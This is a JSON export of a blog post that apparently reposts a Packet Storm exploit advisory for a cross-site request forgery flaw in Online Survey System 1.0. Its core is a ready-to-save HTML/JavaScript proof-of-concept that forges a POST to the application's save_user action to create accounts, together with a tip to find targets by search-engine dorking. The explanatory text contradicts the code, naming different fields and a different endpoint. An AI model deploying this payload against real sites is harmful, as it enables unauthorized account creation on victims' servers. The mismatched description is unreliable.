{"id":59093,"date":"2024-08-22T18:50:24","date_gmt":"2024-08-22T15:50:24","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180327\/oss10-xsrf.txt"},"modified":"2024-08-22T18:50:24","modified_gmt":"2024-08-22T15:50:24","slug":"online-survey-system-1-0-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-survey-system-1-0-cross-site-request-forgery\/","title":{"rendered":"Online Survey System 1.0 Cross Site Request Forgery"},"content":{"rendered":"

=============================================================================================================================================
| # Title : Online Survey System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/simple-online-survey-system_0.zip |
=============================================================================================================================================<\/p>\n

poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This HTML page :<\/p>\n

is a user registration form that allows users to input a username, password, and upload an avatar image.
The form data is then sent via an AJAX request to a server-side script for processing.<\/p>\n[+] Here’s a breakdown of how it works:<\/p>\n

HTML Structure<\/p>\n

Form Elements:<\/p>\n

username: A text field where the user can input their username.
password: A password field for entering a password.
img: A file input for uploading an avatar image (restricted to image file types).<\/p>\n

Save User Button:<\/p>\n

An input element with the type button is used to trigger the saveUser() function when clicked.<\/p>\n[+] JavaScript (AJAX Request)<\/p>\n

AJAX Request:<\/p>\n

An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).
The request method is POST, and the data is sent to the specified URL.
The onload function checks if the request was successful (status code 200). If it was,
it alerts the user that the save was successful; otherwise, it alerts the user of an error.<\/p>\n[+] Backend Requirements :<\/p>\n

The server-side script (Users.php) should be capable of handling the incoming POST request,
processing the form data (including saving the file), and returning an appropriate response.<\/p>\n

This form can be improved by adding additional client-side validations, better error handling,
and perhaps enhancing security measures, such as sanitizing inputs on the server side.<\/p>\n[+] save code as poc.html <\/p>\n[+] payload : <\/p>\n

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>User Registration<\/title>
<\/head>
<body><\/p>\n

<h2>User Registration<\/h2>
<form id=”userForm” enctype=”multipart\/form-data”>
<label for=”email”>Email:<\/label>
<input type=”email” id=”email” name=”email” required><br><br><\/p>\n

<label for=”password”>Password:<\/label>
<input type=”password” id=”password” name=”password” required><br><br><\/p>\n

<input type=”button” value=”Save User” onclick=”saveUser()”>
<\/form><\/p>\n

<script>
function saveUser() {
var form = document.getElementById(‘userForm’);
var formData = new FormData(form);<\/p>\n

var xhr = new XMLHttpRequest();
xhr.open(“POST”, “http:\/\/127.0.0.1\/survey\/ajax.php?action=save_user”, true);<\/p>\n

xhr.onload = function () {
if (xhr.status === 200) {
alert(‘User saved successfully’);
} else {
alert(‘An error occurred while saving the user’);
}
};<\/p>\n

xhr.send(formData);
}
<\/script><\/p>\n

<\/body>
<\/html><\/p>\n

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

=============================================================================================================================================| # Title : Online Survey System 1.0 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/simple-online-survey-system_0.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This HTML page : is a user …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59093","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59093","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59093"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59093\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59093"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59093"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59093"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}